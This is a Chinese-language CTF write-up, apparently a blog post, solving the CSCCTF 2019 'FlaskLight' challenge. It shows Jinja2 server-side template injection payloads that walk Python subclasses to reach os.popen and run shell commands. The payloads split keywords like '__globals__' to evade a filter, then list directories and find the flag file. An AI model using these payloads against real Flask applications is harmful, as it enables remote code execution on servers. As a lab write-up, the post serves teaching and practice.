[CSCCTF 2019 Qual]FlaskLight ---不会编程的崽

疯狂肝模板题。

模板注入点需要找到,源码已经给提示了

可以判断,这是jinja2模板 

 

?search={{[].__class__.__bases__[0].__subclasses__()[40]}}

 

这里已经可以读取文件了,但是flag的路径与文件名都不清楚。所有还是要找个能执行命令的函数。

先找到下边这个类

?search={{[].__class__.__bases__[0].__subclasses__()[59]}}

 

因为[].__class__.__bases__[0].__subclasses__()[59].__init__.__globals__.__builtins__下有eval,__import__等的全局函数,可以利用此来执行命令

一定要要注意,这题它是有过滤的,但是它并不显示,而是报错,我在这搞了好久。。。需要对关键字进行分割

{{[].__class__.__bases__[0].__subclasses__()[59].__init__['__glo'+'bals__']['__bu'+'iltins__']['__imp'+'ort__']('os').__dict__['pop'+'en']('ls').read()}}

 现在就简单了。我们读一下config,它说flag在当前目录下。当前目录应该在/flasklight

当前目录应该在/flasklight

{{[].__class__.__bases__[0].__subclasses__()[59].__init__['__glo'+'bals__']['__bu'+'iltins__']['__imp'+'ort__']('os').__dict__['pop'+'en']('ls /flasklight').read()}}

 已经看到了,就在这个文件里了

{{[].__class__.__bases__[0].__subclasses__()[59].__init__[%27__glo%27+%27bals__%27][%27__bu%27+%27iltins__%27][%27__imp%27+%27ort__%27](%27os%27).__dict__[%27pop%27+%27en%27](%27ls%20/flasklight/coomme_geeeett_youur_flek%27).read()}}

 

 结束。拿到flag。这种模板题一般都这个套路

  • 13
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值